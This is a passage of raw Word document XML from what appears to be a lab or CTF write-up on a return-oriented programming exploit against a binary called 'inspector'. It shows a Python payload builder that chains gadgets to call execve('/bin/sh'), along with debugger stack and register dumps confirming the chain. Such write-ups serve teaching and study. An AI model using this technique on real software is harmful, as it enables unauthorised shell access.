            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   retAddr(E) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0x4004a9 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   // Addr(F) --&gt; ret </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73862D1B" w14:textId="04F29009" w:rsidR="00847435" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D6A54" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00EC1941">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Building the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F650CBB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The payload to exploit inspector will consist of 40 bytes of padding data followed by the address and applicable data for each gadget.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC1941" w14:paraId="235FCFC0" w14:textId="77777777" w:rsidTr="00EC1941">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4472D4E0" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>def buildPld():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045D65B4" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addrA = p64(0x0040062e)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E135314" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datA = p64(0x00400708)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1666F1F2" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addrB = p64(0x00400636)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065C95ED" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addrC = p64(0x0040063e)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28F063BD" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datBC = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292F1DCE" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addrD = p64(0x00400646)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F974101" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datD = p64(0x3b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A57CAF" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addrE = p64(0x00400625)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAD1DB1" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addrF = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F58DA27" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pad = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB5F59E" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4AF29142" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pld = pad + addrA + datA + addrB + datBC + addrC + datBC + addrD + datD +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659C7428" w14:textId="13CEE41F" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:t>addrE + addrF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FD96E0E" w14:textId="3E21007E" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">return pld </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DB1C939" w14:textId="4D71FFED" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD7EB4" w14:textId="63F477BC" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">When testing the payload, the gadget data is visible in the stack before </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1941">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns. Additionally, the debugger output shows the beginning of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1941">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Gadget </w:t>
      </w:r>
      <w:r w:rsidR="00017682">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the next operation following the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1941">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC1941" w14:paraId="7B5C3C5C" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="552E8B9D" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC1941">
              <w:t>Breakpoint 1, 0x0000000000400678 in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A0A71D7" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="538F25DC" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AC57AB" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddc8│+0x0000: 0x00000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0040062e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  →  &lt;gadget_2+4&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>pop rdi     ← $rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FAC006E" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddd0│+0x0008: 0x00000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>00400708</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  →  </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x0068732f6e69622f ("/bin/sh"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74995679" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRPr="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddd8│+0x0010: 0x00000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>00400636</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  →  &lt;gadget_3+4&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>pop rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="399749FB" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde0│+0x0018: 0x00000000000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BFDFCEB" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRPr="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde8│+0x0020: 0x00000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0040063e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  →  &lt;gadget_4+4&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>pop rdx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59DCC24C" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddf0│+0x0028: 0x00000000000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0516D26D" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRPr="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddf8│+0x0030: 0x0000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>000400646</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  →  &lt;gadget_5+4&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>pop rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="751454C9" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffde00│+0x0038: 0x00000000000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>3b</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (";"?) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F4E33A" w14:textId="0472BEDB" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffde08│+0x0038: 0x0000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>000400625</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  →  &lt;gadget_1+4&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>syscall</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6578682D" w14:textId="5FEE9CE8" w:rsidR="00EC1941" w:rsidRDefault="00017682" w:rsidP="00017682">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffde10│+0x0020: 0x0000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0004004a9</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  →  &lt;_init+25&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ret </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F3C201" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7179D071" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="681FB9E2" w14:textId="16666693" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>code:x86:64 ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021E350A" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     0x400677 &lt;main+45&gt;        leave  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BE56605" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> →   0x400678 &lt;main+46&gt;        ret    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A87C02A" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>↳</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    0x40062e &lt;gadget_2+4&gt;     pop    rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3268D911" w14:textId="79223C34" w:rsidR="00EC1941" w:rsidRPr="00B00C0C" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">    0x40062f &lt;gadget_2+5</w:t>
            </w:r>
            <w:r w:rsidRPr="00B00C0C">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;     ret    </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CB2C0CB" w14:textId="7ABD6947" w:rsidR="00847435" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stack and Operations at Breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AF9E6" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1941">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> points to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1941">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Gadget A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the stack pointer points to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1941">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00400708</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as expected.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC1941" w14:paraId="6E988FE4" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0BE043C6" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 2, 0x000000000040062e in gadget_2 ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3594BB80" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25E9FCA9" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>registers ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="111862E8" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRPr="00B00C0C" w:rsidRDefault="00EC1941" w:rsidP="00B00C0C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rsp   : 0x00007fffffffddd0  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B00C0C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>→  0x0000000000400708  →  0x0068732f6e69622f ("/bin/sh"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E375DB" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>$rdi   : 0x00007ffff7fa0a40  →  0x0000000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2D57C9" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rip   : 0x000000000040062e  →  &lt;gadget_2+4&gt; pop rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="598D6BFF" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>$r8    : 0x0000000000602319  →  0x0000000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2174F566" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1EF702C7" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05325307" w14:textId="677DBB7F" w:rsidR="00EC1941" w:rsidRPr="00017682" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddd0│+0x0000:</w:t>
            </w:r>
            <w:r w:rsidR="00017682" w:rsidRPr="00017682">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00017682">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0x0000000000400708  → 0x0068732f6e69622f("/bin/sh"?)     ← $rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A7F900" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddd8│+0x0008: 0x0000000000400636  →  &lt;gadget_3+4&gt; pop rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25085D74" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde0│+0x0010: 0x0000000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CF5E6B5" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde8│+0x0018: 0x000000000040063e  →  &lt;gadget_4+4&gt; pop rdx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FF4F2D" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="718D365B" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>code:x86:64 ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516B2610" w14:textId="77777777" w:rsidR="00EC1941" w:rsidRDefault="00EC1941" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
